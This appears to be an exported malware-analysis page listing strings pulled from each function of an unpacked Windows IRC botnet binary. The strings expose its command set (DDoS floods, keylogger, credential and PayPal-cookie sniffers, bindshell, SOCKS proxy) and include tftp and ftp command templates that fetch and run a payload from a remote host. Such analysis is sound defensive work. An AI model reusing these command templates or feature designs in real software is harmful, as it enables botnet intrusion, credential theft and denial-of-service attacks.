sub_419443(0456):
	"Account: %S"
	"Full Name:	%S"
	"User Comment: %S"
	"Comment: %S"
	"Unknown"
	"Administrator"
	"User"
	"Guest"
	"Privilege Level: %s"
	"Auth Flags: %d"
	"Home Directory: %S"
	"Parameters: %S"
	"Password Age: %d"
	"Bad Password Count: %d"
	"Number of Logins: %d"
	"Last Logon: %d"
	"Last Logoff: %d"
	"Logon Server: %S"
	"Country	Code: %d"
	"User's Language: %d"
	"Max. Storage: %d"
sub_40C3E8(05a7):
	"sym"
sub_40E292(0616):
	"tftp -i %s get %s\r\n"
	"echo open %s %d > o&echo user	1 1 >> o "...
sub_41875E(0703):
	"mIRC"
sub_413079(078a):
	"FTP	sniff"
	"#FAAK#"
	"NICK	"
	"220 "
	"230 "
	"USER	"
	"PASS	"
sub_40E9FB(0ba8):
	WS2_32.recv

	"cmd /c echo open %s %d >> ii &echo user"...
sub_413003(0d1f):
	"IRC	sniff"
	"#FAAK#"
	"OPER	"
	"NICK	"
	"oper	"
	"You are now an IRC Operator"
sub_41A6EA(2156):
	"Software\\Microsoft\\OLE"
	"EnableDCOM"
	"SYSTEM\\CurrentControlSet\\Control\\Lsa"
	"restrictanonymous"
	"%c$"
	"%c:\\"
sub_40C2AF(22a3):
	"%d.%d.%d.%d"
sub_4191DB(3fe3):
	"Share	name:	 Resource:		 "...
	"Yes"
	"No"
	"%-14S %-24S %-6u %-4s"
sub_41ABFB(4107):
	"www.schlund.net"
	"www.utwente.nl"
	"verio.fr"
	"www.1und1.de"
	"www.switch.ch"
	"www.belwue.de"
	"de.yahoo.com"
	"www.google.it"
	"www.xo.net"
	"www.stanford.edu"
	"www.verio.com"
	"www.nocster.com"
	"www.rit.edu"
	"www.cogentco.com"
	"www.burst.net"
	"nitro.ucsc.edu"
	"www.level3.com"
	"www.above.net"
	"www.easynews.com"
	"www.google.com"
	"www.lib.nthu.edu.tw"
	"www.st.lib.keio.ac.jp"
	"www.d1asia.com"
	"www.nifty.com"
	"yahoo.co.jp"
	"www.google.co.jp"
sub_401ACD(41ca):
	" :"
	" "
	"!"
	"PING"
	"PONG	%s\r\n"
	"JOIN	%s %s\r\n"
	"001"
	"005"
	"302"
	"@"
	"433"
	"NICK	%s\r\n"
	"KICK"
	"NOTICE %s :%s\r\n"
	"JOIN	%s %s\r\n"
	"NICK"
	":%s%s"
	"PART"
	"QUIT"
	"353"
	"PART"
	"NOTICE %s :%s\r\n"
	"PRIVMSG"
	"NOTICE"
	"SEND"
	"%s"
	"CHAT"
	"%s"
	"c"
	"k"
	" :"
	"$%d-"
	"$%d"
	"$me"
	"$user"
	"$chan"
	"$rndnick"
	"$server"
	"$chr("
	")"
	"63"
	" "
	" "
	"rndnick"
	"rn"
	"di3"
	"di3"
	"logout"
	"lo"
	"version"
	"ver"
	"rulez"
	"rz"
	"speedtest"
	"st"
	"secure"
	"sec"
	"unsecure"
	"unsec"
	"bindshell"
	"bd"
	"Server"
	"socks4"
	"s4"
	"socks4stop"
	"Server"
	"rloginstop"
	"Server"
	"httpstop"
	"Server"
	"logstop"
	"redirectstop"
	"synstop"
	"skysynstop"
	"targa3stop"
	"wonkstop"
	"packetstop"
	"tsunamistop"
	"wisdomstop"
	"udpstop"
	"pingstop"
	"tftpstop"
	"Server"
	"findfilestop"
	"ffstop"
	"procsstop"
	"psstop"
	"clonestop"
	"Clone"
	"securestop"
	"Secure"
	"scanstop"
	"Scan"
	"scanstats"
	"stats"
	"trstats"
	"connectbackstats"
	"cbstats"
	"exploitlist"
	"explist"
	"reconnect"
	"r"
	"disconnect"
	"dc"
	"quit"
	"q"
	"status"
	"s"
	"id"
	"i"
	"r3start"
	"threads"
	"t"
	"aliases"
	"al"
	"log"
	"lg"
	"clearlog"
	"clg"
	"netinfo"
	"ni"
	"sysinfo"
	"si"
	"KOSOMAKY4D"
	"KOSOMAKY4D"
	"procs"
	"ps"
	"uptime"
	"up"
	"driveinfo"
	"drv"
	"testdlls"
	"dll"
	"opencmd"
	"ocmd"
	"cmdstop"
	""
	"%d. %s"
	"spoof"
	"off"
	"getclip"
	"gc"
	"flusharp"
	"farp"
	"flushdns"
	"fdns"
	"currentip"
	"cip"
	"rloginserver"
	"rlogin"
	"httpserver"
	"http"
	"tftpserver"
	"tftp"
	"shitycrash"
	"shitycrash"
	"asc"
	"as"
	"phonehome"
	"NOTICE %s :PHONING HOME: DADI	Are You	T"...
	"findpass"
	"fp"
	"#f"
	"#f"
	"Random"
	"Sequential"
	"full"
	"%s"
	"saadfgh"
	"QUIT	:%s\r\n"
	"QUIT :later\r\n"
	"QUIT :disconnecting\r\n"
	"QUIT :reconnecting\r\n"
	"secure"
	"sec"
	"Unsecuring"
	"abosel7 v4"
	"get"
	"%d.%d.%d.*"
	"exploit"
	"#f"
	"#f"
	"reconnect.in"
	"rin"
	"reconnect.in.ms"
	"rinms"
	"flood"
	"load"
	" "
	" "
	"nt"
	" "
	"notice %s	:%s"
	"mode"
	" "
	"mode	%s %s"
	"join"
	"join	%s"
	"part"
	"part	%s"
	"partflood"
	"part	%s %s"
	"pnick"
	"join	%s"
	"part	%s %s"
	"join	%s"
	"part	%s %s"
	"join	%s"
	"part	%s %s"
	"nick"
	"join	%s"
	"chgnick"
	"msg"
	"join	%s"
	"notice"
	"join	%s"
	"NOTICE %s	:%s"
	"NOTICE %s	:%s"
	"NOTICE %s	:%s"
	"ctcp"
	"join	%s"
	"mix"
	"join	%s"
	"NOTICE %s	:%s"
	"PRIVMSG %s :%s"
	"NOTICE %s	:%s"
	"register"
	"nickserv register %s %s"
	"off"
	"nick"
	"n"
	"join"
	"j"
	"part"
	"pt"
	"raw"
	"r"
	"killthread"
	"k"
	"c_quit"
	"c_q"
	"c_rndnick"
	"c_rn"
	"prefix"
	"pr"
	"open"
	"o"
	"server"
	"se"
	"dns"
	"dn"
	"killproc"
	"kp"
	"kill"
	"ki"
	"delete"
	"del"
	"get"
	"gt"
	"list"
	"li"
	"visit"
	"v"
	"mirccmd"
	"mirc"
	"cmd"
	"cm"
	"readfile"
	"rf"
	"psniff"
	"on"
	"#f"
	"off"
	"sniffer"
	"on"
	"#f"
	"off"
	"ident"
	"on"
	"off"
	"keyloger"
	"keylog"
	"stop"
	"stop"
	"net"
	"start"
	"stop"
	"pause"
	"continue"
	"delete"
	"%s"
	"share"
	"user"
	"send"
	"gethost"
	"gh"
	"killlog"
	"kl"
	"addalias"
	"aa"
	"privmsg"
	"action"
	"a"
	"cycle"
	"cy"
	"mode"
	"m"
	"c_raw"
	"c_r"
	"c_mode"
	"c_m"
	"c_nick"
	"c_n"
	"c_join"
	"c_j"
	"c_part"
	"c_p"
	"targa3"
	"t3"
	"tsunami"
	"tsn"
	"repeat"
	"rp"
	"delay"
	"de"
	"HADETH3"
	"HADETH3"
	"execute"
	"e"
	"findfile"
	"ff"
	"rename"
	"mv"
	"icmpflood"
	"icmp"
	"clone"
	"c"
	"ddos.syn"
	"ddos.ack"
	"ddos.random"
	"wisdom.udp"
	"synflood"
	"syn"
	"skysyn"
	"phatwonk"
	"wonk"
	"NAZEL3"
	"NAZEL3"
	"redirect"
	"rd"
	"scan"
	"sc"
	"c_privmsg"
	"c_pm"
	"c_action"
	"c_a"
	"portscan"
	"psc"
	"advscan"
	"ad"
	"udpflood"
	"udp"
	"u"
	"netsend"
	"ns"
	"pingflood"
	"ping"
	"p"
	"vnchost"
	"VNC: HTTP Host Changed To: %s"
	"tcpflood"
	"tcp"
	"email"
	" "
	"helo $rndnick\nmail from: <%s>\nrcpt to: "...
	"httpcon"
	"hcon"
	"syn"
	"ack"
	"random"
	"Spoofed"
	"Normal"
	"ICMP.dll not available"
	"upload"
	"%s\\%i%i%i.dll"
	"ab"
	"open %s\r\n%s\r\n%s\r\n%s\r\nput %s\r\nbye\r\n"
	"-s:%s"
	"ftp.exe"
	"open"
	"#f"
	"Random"
	"Sequential"
	"[%s]	* %s %s"
	"[%s]	<%s> %s"
	"saadfgh"
	"%s%s.exe"
	"repeat"
	"MODE	%s\r\n"
	"JOIN	%s %s\r\n"
	"Keylog"
	"VrX v3.0 sites keylogger active."
	"Keyloger Already running."
	"web"
	"#f"
	"VrX v3.0 sites keylogger active."
	"normal"
	"#f"
	"Normal key logger active."
	"Failed to start logging thread, error: "...
	"Unknow mode type."
	"r"
	"\n"
	"%s"
	"open"
	"QUIT :later\r\n"
	"all"
	"JOIN	%s %s\r\n"
	"NICK	%s\r\n"
	"QUIT :reconnecting\r\n"
	"QUIT :reconnecting\r\n"
	"NICK	%s\r\n"
	"!"
	"~"
	"cool"
	"NOTICE %s :Pass auth failed (%s!%s).\r\n"
	"NOTICE %s :Your attempt has been logged"...
	"NOTICE %s :Host Auth failed (%s!%s).\r\n"
	"NOTICE %s :Your attempt has been logged"...
	"cool"
	"USERHOST %s\r\n"
	"-x+i"
	"MODE %s %s\r\n"
	"JOIN	%s %s\r\n"
sub_41ADD8(423a):
	"%dd %dh %dm"
sub_401000(4800):
	"Windos Seres Agnts"
sub_409909(4984):
	"kernel32.dll"
	"SetErrorMode"
	"CreateToolhelp32Snapshot"
	"Process32First"
	"GetDiskFreeSpaceExA"
	"GetLogicalDriveStringsA"
	"SearchPathA"
	"QueryPerformanceCounter"
	"QueryPerformanceFrequency"
	"RegisterServiceProcess"
	"user32.dll"
	"SendMessageA"
	"FindWindowA"
	"IsWindow"
	"GetClipboardData"
	"CloseClipboard"
	"GetAsyncKeyState"
	"GetKeyState"
	"GetWindowTextA"
	"GetForegroundWindow"
	"advapi32.dll"
	"RegCreateKeyExA"
	"RegSetValueExA"
	"RegQueryValueExA"
	"RegDeleteValueA"
	"RegCloseKey"
	"ClearEventLogA"
	"OpenProcessToken"
	"LookupPrivilegeValueA"
	"AdjustTokenPrivileges"
	"OpenSCManagerA"
	"OpenServiceA"
	"ControlService"
	"CloseServiceHandle"
	"EnumServicesStatusA"
	"IsValidSecurityDescriptor"
	"GetUserNameA"
	"gdi32.dll"
	"CreateDCA"
	"CreateDIBSection"
	"CreateCompatibleDC"
	"GetDIBColorTable"
	"SelectObject"
	"BitBlt"
	"DeleteDC"
	"DeleteObject"
	"ws2_32.dll"
	"WSAStartup"
	"WSASocketA"
	"WSAAsyncSelect"
	"__WSAFDIsSet"
	"WSAIoctl"
	"WSAGetLastError"
	"WSACleanup"
	"socket"
	"ioctlsocket"
	"connect"
	"inet_ntoa"
	"inet_addr"
	"htons"
	"htonl"
	"ntohs"
	"ntohl"
	"send"
	"sendto"
	"recv"
	"recvfrom"
	"bind"
	"select"
	"listen"
	"accept"
	"setsockopt"
	"getsockname"
	"gethostname"
	"getpeername"
	"closesocket"
	"wininet.dll"
	"InternetGetConnectedState"
	"InternetGetConnectedStateEx"
	"HttpOpenRequestA"
	"HttpSendRequestA"
	"InternetConnectA"
	"InternetOpenUrlA"
	"InternetCrackUrlA"
	"InternetReadFile"
	"InternetCloseHandle"
	"Mozilla/4.0 (compatible)"
	"icmp.dll"
	"IcmpCreateFile"
	"IcmpCloseHandle"
	"IcmpSendEcho"
	"netapi32.dll"
	"NetShareAdd"
	"NetShareDel"
	"NetShareEnum"
	"NetScheduleJobAdd"
	"NetApiBufferFree"
	"NetRemoteTOD"
	"NetUserAdd"
	"NetUserDel"
	"NetUserEnum"
	"NetUserGetInfo"
	"NetMessageBufferSend"
	"NetWkstaGetInfo"
	"dnsapi.dll"
	"DnsFlushResolverCache"
	"DnsFlushResolverCacheEntry_A"
	"iphlpapi.dll"
	"DeleteIpNetEntry"
	"mpr.dll"
	"WNetAddConnection2A"
	"WNetAddConnection2W"
	"WNetCancelConnection2A"
	"WNetCancelConnection2W"
	"shell32.dll"
	"SHChangeNotify"
	"odbc32.dll"
	"SQLDriverConnect"
	"SQLAllocHandle"
	"avicap32.dll"
	"capCreateCaptureWindowA"
	"capGetDriverDescriptionA"
sub_418AF1(4d20):
	"netapi32.dll"
	"NetMessageBufferSend"
sub_40ADE1(4ec8):
	"mIRC"
sub_422279(502f):
	"e+000"
sub_416DD9(5886):
	"%sKB"
	"failed"
sub_418699(5bd7):
	"%s	Error: %s <%d>."
sub_40D4E2(5f99):
	"GET /	HTTP/1.0\r\nHost: %s\r\nAuthorization"...
sub_426173(5fbb):
	"invalid string position"
sub_425029(60f6):
	"user32.dll"
	"MessageBoxA"
	"GetActiveWindow"
	"GetLastActivePopup"
sub_425973(6338):
	"1#SNAN"
	"1#IND"
	"1#INF"
	"1#QNAN"
sub_418D2A(6353):
	"The specified	service	name is	invalid."
	"The requested	control	code is	undefined"...
	"The handle is	invalid."
	"The handle does not have the required	a"...
	"The service binary file could	not be fo"...
	"The service cannot be	stopped	because	o"...
	"The database is locked."
	"A thread could not be	created	for the	s"...
	"The process for the service was started"...
	"The requested	control	code is	not valid"...
	"An instance of the service is	already	r"...
	"The system is	shutting down."
	"An unknown error occurred: <%ld>"
sub_4131EC(6fdf):
	WS2_32.htons

	"%s"
	"%s"
sub_40B90E(7139):
	" Total: %d in %s."
sub_412EEC(79f8):
	"Bot	sniff"
	"#FAAK#"
	"[PSNIFF]:"
	"PSNIFF//"
	"JOIN	#"
	"302 "
	"366 "
	":.login"
	":!login"
	":!Login"
	":.Login"
	":.ident"
	":!ident"
	":.hashin"
	":!hashin"
sub_417E84(7aa9):
	"-|`_\\{[]}"
	"-|`_\\{[]}"
	"-|`_\\{[]}"
	"-|`_\\{[]}"
sub_41036B(7f62):
	"\n"
	"PRIVMSG %s :Searching	for: %s\r\n"
	"\r\n\r\nIndex of %s</TIT"...
	"<H1>Index of %s</H1>\r\n<TABLE BORDER=\"0\""...
	"<TR>\r\n<TD WIDTH=\"%d\"><CODE>Name</CODE><"...
	"<TR>\r\n<TD COLSPAN=\"3\"><HR></TD>\r\n</TR>\r"...
	"<TR>\r\n<TD COLSPAN=\"3\"><A HREF=\"%s\"><COD"...
	".."
	"."
	"PM"
	"AM"
	"%2.2d/%2.2d/%4d  %2.2d:%2.2d %s"
	"<%s>"
	"PRIVMSG %s :%-31s  %-21s\n"
	"<TR>\r\n<TD WIDTH=\"%d\"><A HREF=\""
	"%s%s/"
	"\"><CODE>%.29s>/</CODE></A>"
	"\"><CODE>%s/</CODE></A>"
	"</TD>\r\n<TD WIDTH=\"%d\"><CODE>%s</CODE></"...
	"<%s>"
	"%-31s  %-21s\r\n"
	"PRIVMSG %s :%-31s  %-21s (%s bytes)\n"
	"<TR>\r\n<TD WIDTH=\"%d\"><A HREF=\""
	"\"><CODE>%.30s></CODE></A>"
	"\"><CODE>%s</CODE></A>"
	"</TD>\r\n<TD WIDTH=\"%d\"><CODE>%s</CODE></"...
	"%-31s  %-21s (%i bytes)\r\n"
	"PRIVMSG %s :Found %s Files and %s Direc"...
	"<TR>\r\n<TD COLSPAN=\"3\"><HR></TD>\r\n</TR>\r"...
	"Found: %i Files and %i Directories\r\n"
</font></pre></td></tr><tr id="sub_40B648"><td><pre><a name="sub_40B648"></a><a href="577032d590e1a60c50c3bca55656f15c_unpacked.asm.html#sub_40B648"><font size=+2>sub_40B648</a>(8732)</font>:<font color=brown>
	"%s %s	stopped. (%d thread(s) stopped.)"
	"%s No	%s thread found."
</font></pre></td></tr><tr id="sub_409869"><td><pre><a name="sub_409869"></a><a href="577032d590e1a60c50c3bca55656f15c_unpacked.asm.html#sub_409869"><font size=+2>sub_409869</a>(89be)</font>:<font color=brown>
	"NOTICE"
	"PRIVMSG"
	"%s"
	"%s %s :%s\r\n"
</font></pre></td></tr><tr id="sub_40BA9E"><td><pre><a name="sub_40BA9E"></a><a href="577032d590e1a60c50c3bca55656f15c_unpacked.asm.html#sub_40BA9E"><font size=+2>sub_40BA9E</a>(8cec)</font>:<font color=brown>
	" Scan Time: %s."
</font></pre></td></tr><tr id="sub_40FF31"><td><pre><a name="sub_40FF31"></a><a href="577032d590e1a60c50c3bca55656f15c_unpacked.asm.html#sub_40FF31"><font size=+2>sub_40FF31</a>(8f2f)</font>:<font color=brown>
	"text/html"
	"application/octet-stream"
	"ddd, dd	MMM yyyy"
	"HH:mm:ss"
	"HTTP/1.0 200 OK\r\nServer: myBot\r\nCache-C"...
	"HTTP/1.0 200 OK\r\nServer: myBot\r\nCache-C"...
</font></pre></td></tr><tr id="sub_419C09"><td><pre><a name="sub_419C09"></a><a href="577032d590e1a60c50c3bca55656f15c_unpacked.asm.html#sub_419C09"><font size=+2>sub_419C09</a>(9226)</font>:<font color=brown>
	"SeDebugPrivilege"
	" %s (%d)"
	"SeDebugPrivilege"
</font></pre></td></tr><tr id="sub_413694"><td><pre><a name="sub_413694"></a><a href="577032d590e1a60c50c3bca55656f15c_unpacked.asm.html#sub_413694"><font size=+2>sub_413694</a>(956f)</font>:<font color=brown>
	"ddos.syn"
	"ddos.ack"
	"ddos.random"
</font></pre></td></tr><tr id="sub_4199AC"><td><pre><a name="sub_4199AC"></a><a href="577032d590e1a60c50c3bca55656f15c_unpacked.asm.html#sub_4199AC"><font size=+2>sub_4199AC</a>(9bb4)</font>:<font color=brown>
	"Invalid parameter."
	"Server name not found."
	"This network request is not supported."
	"Not enough memory."
	"The name is invalid."
	"Duplicate share name."
	"Invalid for redirected resource."
	"Device or directory does not exist."
	"Level	parameter is invalid."
	"A general failure occurred in	the netwo"...
	"The operation	is allowed only	on the pr"...
	"The user account already exists."
	"The group already exists."
	"The password is shorter than required	("...
	"An unknown error occurred."
	"The computer name is invalid."
	"Share	not found."
	"The user name	could not be found."
	"Network connection not found."
</font></pre></td></tr><tr id="sub_423DD1"><td><pre><a name="sub_423DD1"></a><a href="577032d590e1a60c50c3bca55656f15c_unpacked.asm.html#sub_423DD1"><font size=+2>sub_423DD1</a>(9d55)</font>:<font color=brown>
	"<program name	unknown>"
	"..."
	"Runtime Error!\n\nProgram: "
	"\n\n"
	"Microsoft Visual C++ Runtime Library"
</font></pre></td></tr><tr id="sub_418884"><td><pre><a name="sub_418884"></a><a href="577032d590e1a60c50c3bca55656f15c_unpacked.asm.html#sub_418884"><font size=+2>sub_418884</a>(9dbe)</font>:<font color=brown>
	"SeShutdownPrivilege"
</font></pre></td></tr><tr id="sub_4172C1"><td><pre><a name="sub_4172C1"></a><a href="577032d590e1a60c50c3bca55656f15c_unpacked.asm.html#sub_4172C1"><font size=+2>sub_4172C1</a>(a649)</font>:<font color=brown>
	"SeDebugPrivilege"
	"NTDLL.DLL"
	"NtQuerySystemInformation"
	"RtlCreateQueryDebugBuffer"
	"RtlQueryProcessDebugInformation"
	"RtlDestroyQueryDebugBuffer"
	"RtlRunDecodeUnicodeString"
	"SeDebugPrivilege"
</font></pre></td></tr><tr id="sub_417493"><td><pre><a name="sub_417493"></a><a href="577032d590e1a60c50c3bca55656f15c_unpacked.asm.html#sub_417493"><font size=+2>sub_417493</a>(a694)</font>:<font color=brown>
	"WINLOGON"
	"NWGINA"
	"MSGINA"
</font></pre></td></tr><tr id="sub_41982C"><td><pre><a name="sub_41982C"></a><a href="577032d590e1a60c50c3bca55656f15c_unpacked.asm.html#sub_41982C"><font size=+2>sub_41982C</a>(a909)</font>:<font color=brown>
	"Username accounts for	local system:"
	"  %S"
	"Total	users found: %d."
</font></pre></td></tr><tr id="sub_41B52C"><td><pre><a name="sub_41B52C"></a><a href="577032d590e1a60c50c3bca55656f15c_unpacked.asm.html#sub_41B52C"><font size=+2>sub_41B52C</a>(a9b1)</font>:<font color=brown>
	"%s"
</font></pre></td></tr><tr id="sub_419FD5"><td><pre><a name="sub_419FD5"></a><a href="577032d590e1a60c50c3bca55656f15c_unpacked.asm.html#sub_419FD5"><font size=+2>sub_419FD5</a>(b276)</font>:<font color=brown>
	"PRIVMSG %s	:%s\r"
	"%s"
</font></pre></td></tr><tr id="sub_416D48"><td><pre><a name="sub_416D48"></a><a href="577032d590e1a60c50c3bca55656f15c_unpacked.asm.html#sub_416D48"><font size=+2>sub_416D48</a>(b2db)</font>:<font color=brown>
	"Cdrom"
	"Network"
	"Disk"
	"Invalid"
	"Unknown"
</font></pre></td></tr><tr id="sub_40AAAC"><td><pre><a name="sub_40AAAC"></a><a href="577032d590e1a60c50c3bca55656f15c_unpacked.asm.html#sub_40AAAC"><font size=+2>sub_40AAAC</a>(b82b)</font>:<font color=brown>
	"%s"
</font></pre></td></tr><tr id="sub_413100"><td><pre><a name="sub_413100"></a><a href="577032d590e1a60c50c3bca55656f15c_unpacked.asm.html#sub_413100"><font size=+2>sub_413100</a>(b9cf)</font>:<font color=brown>
	"HTTP sniff"
	"#FAAK#"
	"paypal"
	"PAYPAL"
	"PAYPAL.COM"
	"paypal.com"
	"Set-Cookie:"
</font></pre></td></tr><tr id="sub_422152"><td><pre><a name="sub_422152"></a><a href="577032d590e1a60c50c3bca55656f15c_unpacked.asm.html#sub_422152"><font size=+2>sub_422152</a>(bb03)</font>:<font color=brown>
	"KERNEL32"
	"IsProcessorFeaturePresent"
</font></pre></td></tr><tr id="sub_4187E0"><td><pre><a name="sub_4187E0"></a><a href="577032d590e1a60c50c3bca55656f15c_unpacked.asm.html#sub_4187E0"><font size=+2>sub_4187E0</a>(c0b1)</font>:<font color=brown>
	"explorer.exe"
</font></pre></td></tr><tr id="sub_41AF8F"><td><pre><a name="sub_41AF8F"></a><a href="577032d590e1a60c50c3bca55656f15c_unpacked.asm.html#sub_41AF8F"><font size=+2>sub_41AF8F</a>(c398)</font>:<font color=brown>
	"2003"
	"couldn't resolve host"
	"HH:mm:ss"
</font></pre></td></tr><tr id="sub_413187"><td><pre><a name="sub_413187"></a><a href="577032d590e1a60c50c3bca55656f15c_unpacked.asm.html#sub_413187"><font size=+2>sub_413187</a>(cfb4)</font>:<font color=brown>
	"VULN sniff"
	"#FAAK#"
	"OpenSSL/0.9.6"
	"Serv-U FTP Server"
	"OpenSSH_2"
</font></pre></td></tr><tr id="sub_401955"><td><pre><a name="sub_401955"></a><a href="577032d590e1a60c50c3bca55656f15c_unpacked.asm.html#sub_401955"><font size=+2>sub_401955</a>(d74b)</font>:<font color=brown>
	"PASS	%s\r\n"
</font></pre></td></tr><tr id="sub_41A3C6"><td><pre><a name="sub_41A3C6"></a><a href="577032d590e1a60c50c3bca55656f15c_unpacked.asm.html#sub_41A3C6"><font size=+2>sub_41A3C6</a>(d7b4)</font>:<font color=brown>
	"Software\\Microsoft\\OLE"
	"EnableDCOM"
	"SYSTEM\\CurrentControlSet\\Control\\Lsa"
	"restrictanonymous"
</font></pre></td></tr><tr id="sub_4188A6"><td><pre><a name="sub_4188A6"></a><a href="577032d590e1a60c50c3bca55656f15c_unpacked.asm.html#sub_4188A6"><font size=+2>sub_4188A6</a>(d7bc)</font>:<font color=brown>
	"%sdel.bat"
	"@echo	off\r\n:repeat\r\ndel \"%%1\"\r\nif exist"...
	"%%comspec%% /c %s	%s"
</font></pre></td></tr><tr id="sub_417B2F"><td><pre><a name="sub_417B2F"></a><a href="577032d590e1a60c50c3bca55656f15c_unpacked.asm.html#sub_417B2F"><font size=+2>sub_417B2F</a>(d935)</font>:<font color=brown>
	"\n"
</font></pre></td></tr><tr id="sub_417C61"><td><pre><a name="sub_417C61"></a><a href="577032d590e1a60c50c3bca55656f15c_unpacked.asm.html#sub_417C61"><font size=+2>sub_417C61</a>(d9b1)</font>:<font color=brown>
	"NICK %s\nUSER	%s \"hotmail.com\" \"127.0.0."...
</font></pre></td></tr><tr id="sub_40AA06"><td><pre><a name="sub_40AA06"></a><a href="577032d590e1a60c50c3bca55656f15c_unpacked.asm.html#sub_40AA06"><font size=+2>sub_40AA06</a>(e076)</font>:<font color=brown>
	"%d.%d.%d.%d"
</font></pre></td></tr><tr id="sub_410ADC"><td><pre><a name="sub_410ADC"></a><a href="577032d590e1a60c50c3bca55656f15c_unpacked.asm.html#sub_410ADC"><font size=+2>sub_410ADC</a>(e1a1)</font>:<font color=brown>
	"%s %s	HTTP/1.1\nReferer: %s\nHost: %s\nCon"...
</font></pre></td></tr><tr id="sub_415D38"><td><pre><a name="sub_415D38"></a><a href="577032d590e1a60c50c3bca55656f15c_unpacked.asm.html#sub_415D38"><font size=+2>sub_415D38</a>(e4b2)</font>:<font color=brown>
	"[%.2d-%.2d-%4d %.2d:%.2d:%.2d] %s"
</font></pre></td></tr><tr id="sub_417B76"><td><pre><a name="sub_417B76"></a><a href="577032d590e1a60c50c3bca55656f15c_unpacked.asm.html#sub_417B76"><font size=+2>sub_417B76</a>(ed20)</font>:<font color=brown>
	" "
	"PING"
	"433"
</font></pre></td></tr><tr id="sub_40FAD6"><td><pre><a name="sub_40FAD6"></a><a href="577032d590e1a60c50c3bca55656f15c_unpacked.asm.html#sub_40FAD6"><font size=+2>sub_40FAD6</a>(f1a3)</font>:<font color=brown>
	"GET "
	" "
	"\r\n"
</font></pre></td></tr><tr id="sub_40CD9E"><td><pre><a name="sub_40CD9E"></a><a href="577032d590e1a60c50c3bca55656f15c_unpacked.asm.html#sub_40CD9E"><font size=+2>sub_40CD9E</a>(f1cc)</font>:<font color=brown>
	"BBBB"
	"CCCC"
</font></pre></td></tr><tr id="sub_418EA8"><td><pre><a name="sub_418EA8"></a><a href="577032d590e1a60c50c3bca55656f15c_unpacked.asm.html#sub_418EA8"><font size=+2>sub_418EA8</a>(f2dd)</font>:<font color=brown>
	"The following	Windows	services are regi"...
	"	 Unknown"
	"	 Paused"
	"    Pausing"
	" Continuing"
	"    Running"
	"    Stoping"
	"   Starting"
	"    Stopped"
	"%s: %s (%s)"
</font></pre></td></tr><tr id="sub_41AA1E"><td><pre><a name="sub_41AA1E"></a><a href="577032d590e1a60c50c3bca55656f15c_unpacked.asm.html#sub_41AA1E"><font size=+2>sub_41AA1E</a>(f3f9)</font>:<font color=brown>
	"POST / HTTP/1.0\r\nHost: %s\r\nContent-Leng"...
	"\r\n"
</font></pre></td></tr><tr id="sub_416EFD"><td><pre><a name="sub_416EFD"></a><a href="577032d590e1a60c50c3bca55656f15c_unpacked.asm.html#sub_416EFD"><font size=+2>sub_416EFD</a>(f5ac)</font>:<font color=brown>
	"failed"
</font></pre></td></tr><tr id="sub_40A5C5"><td><pre><a name="sub_40A5C5"></a><a href="577032d590e1a60c50c3bca55656f15c_unpacked.asm.html#sub_40A5C5"><font size=+2>sub_40A5C5</a>(f9e9)</font>:<font color=brown>
	"Kernel32.dll failed. <%d>"
	"User32.dll failed. <%d>"
	"Advapi32.dll failed. <%d>"
	"Gdi32.dll failed. <%d>"
	"Ws2_32.dll failed. <%d>"
	"Wininet.dll failed. <%d>"
	"Icmp.dll failed. <%d>"
	"Netapi32.dll failed. <%d>"
	"Dnsapi.dll failed. <%d>"
	"Iphlpapi.dll failed. <%d>"
	"Mpr32.dll failed. <%d>"
	"Shell32.dll failed. <%d>"
	"Odbc32.dll failed. <%d>"
	"Avicap32.dll failed. <%d>"
</font></pre></td></tr><tr id="sub_411920"><td><pre><a name="sub_411920"></a><a href="577032d590e1a60c50c3bca55656f15c_unpacked.asm.html#sub_411920"><font size=+2>sub_411920</a>(fa3f)</font>:<font color=brown>
	"cmd /q"
</font></pre></td></tr><tr id="sub_4100B4"><td><pre><a name="sub_4100B4"></a><a href="577032d590e1a60c50c3bca55656f15c_unpacked.asm.html#sub_4100B4"><font size=+2>sub_4100B4</a>(ff11)</font>:<font color=brown>
	"\\%s"
	"%s"
	"\n"
	"*"
</font></pre></td></tr></table><script>
document.getElementById(window.location.href.split('#')[1]).setAttribute("style", "background-color:#ddddff");
</script>
</html>